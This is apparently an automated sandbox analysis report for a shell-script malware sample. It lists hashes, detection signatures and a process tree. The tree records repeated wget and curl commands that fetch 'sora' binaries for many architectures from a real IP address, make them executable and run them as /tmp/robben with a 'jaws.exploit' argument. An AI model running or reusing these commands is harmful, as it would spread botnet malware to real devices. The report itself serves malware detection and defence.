Analysis
-
max time kernel
42s -
max time network
45s -
platform
debian-9_mipsel -
resource
debian9-mipsel-20240611-en -
resource tags
arch:mipselimage:debian9-mipsel-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem -
submitted
18/10/2024, 01:47
Static task
static1
Behavioral task
behavioral1
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral2
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-mipsbe-20240729-en
Behavioral task
behavioral4
Sample
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Resource
debian9-mipsel-20240611-en
General
-
Target
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
-
Size
2KB
-
MD5
891d1dcbed8ea0751d0c0d0fec39ae18
-
SHA1
57db06f345b0d9b4e2a7f4a502678a82ed792174
-
SHA256
5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a
-
SHA512
20efcebab56d13d819a5fc0f1cdaf5952ec218e8ad4a8ecad863b5ccbbbc60bf82ad7bedb67196ae51c9c0156fce1a2279013018268560331c3b436762ed2992
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 781 chmod 799 chmod 824 chmod 833 chmod 855 chmod 743 chmod 749 chmod 872 chmod 887 chmod 727 chmod 765 chmod 737 chmod 816 chmod 881 chmod -
Executes dropped EXE 14 IoCs
ioc pid Process /tmp/robben 728 robben /tmp/robben 738 robben /tmp/robben 744 robben /tmp/robben 750 robben /tmp/robben 766 robben /tmp/robben 782 robben /tmp/robben 800 robben /tmp/robben 817 robben /tmp/robben 825 robben /tmp/robben 834 robben /tmp/robben 857 robben /tmp/robben 874 robben /tmp/robben 882 robben /tmp/robben 888 robben -
description ioc Process File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 732 wget 733 curl 736 cat -
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/robben 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh
Processes
-
/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh/tmp/5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh1⤵
- Writes file to tmp directory
PID:700 -
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x862⤵PID:705
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x862⤵
- Reads runtime system information
PID:715
-
-
/bin/catcat sora.x862⤵PID:725
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE2⤵
- File and Directory Permissions Modification
PID:727
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:728
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mips2⤵
- System Network Configuration Discovery
PID:732
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
PID:733
-
-
/bin/catcat sora.mips2⤵
- System Network Configuration Discovery
PID:736
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE2⤵
- File and Directory Permissions Modification
PID:737
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:738
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.x86_642⤵PID:740
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.x86_642⤵
- Reads runtime system information
PID:741
-
-
/bin/catcat sora.x86_642⤵PID:742
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE2⤵
- File and Directory Permissions Modification
PID:743
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:744
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i4682⤵PID:746
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i4682⤵
- Reads runtime system information
PID:747
-
-
/bin/catcat sora.i4682⤵PID:748
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE2⤵
- File and Directory Permissions Modification
PID:749
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:750
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.i6862⤵PID:752
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.i6862⤵
- Reads runtime system information
PID:756
-
-
/bin/catcat sora.i6862⤵PID:764
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE2⤵
- File and Directory Permissions Modification
PID:765
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:766
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.mpsl2⤵PID:769
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.mpsl2⤵
- Reads runtime system information
PID:772
-
-
/bin/catcat sora.mpsl2⤵PID:780
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE2⤵
- File and Directory Permissions Modification
PID:781
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:782
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm42⤵PID:785
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm42⤵
- Reads runtime system information
PID:787
-
-
/bin/catcat sora.arm42⤵PID:796
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE2⤵
- File and Directory Permissions Modification
PID:799
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:800
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm52⤵PID:802
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm52⤵
- Reads runtime system information
PID:807
-
-
/bin/catcat sora.arm52⤵PID:815
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE2⤵
- File and Directory Permissions Modification
PID:816
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:817
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm62⤵PID:820
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm62⤵
- Reads runtime system information
PID:822
-
-
/bin/catcat sora.arm62⤵PID:823
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben systemd-private-e7e7d2b1d09144089229e6aaa269dbb1-systemd-timedated.service-iAwSwE2⤵
- File and Directory Permissions Modification
PID:824
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:825
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.arm72⤵PID:827
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.arm72⤵
- Reads runtime system information
PID:829
-
-
/bin/catcat sora.arm72⤵PID:832
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:833
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:834
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc2⤵PID:836
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc2⤵
- Reads runtime system information
PID:847
-
-
/bin/catcat sora.ppc2⤵PID:854
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:857
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.ppc440fp2⤵PID:859
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.ppc440fp2⤵
- Reads runtime system information
PID:863
-
-
/bin/catcat sora.ppc440fp2⤵PID:870
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:872
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:874
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.m68k2⤵PID:876
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.m68k2⤵
- Reads runtime system information
PID:879
-
-
/bin/catcat sora.m68k2⤵PID:880
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:881
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:882
-
-
/usr/bin/wgetwget http://93.123.85.141/bins/sora.sh42⤵PID:884
-
-
/usr/bin/curlcurl -O http://93.123.85.141/bins/sora.sh42⤵
- Reads runtime system information
PID:885
-
-
/bin/catcat sora.sh42⤵PID:886
-
-
/bin/chmodchmod +x 5a4fe2a7a0edf99b3f91d79fd53f4abce9872234f95d22241083e6749ae17f7a.sh robben2⤵
- File and Directory Permissions Modification
PID:887
-
-
/tmp/robben./robben jaws.exploit2⤵
- Executes dropped EXE
PID:888
-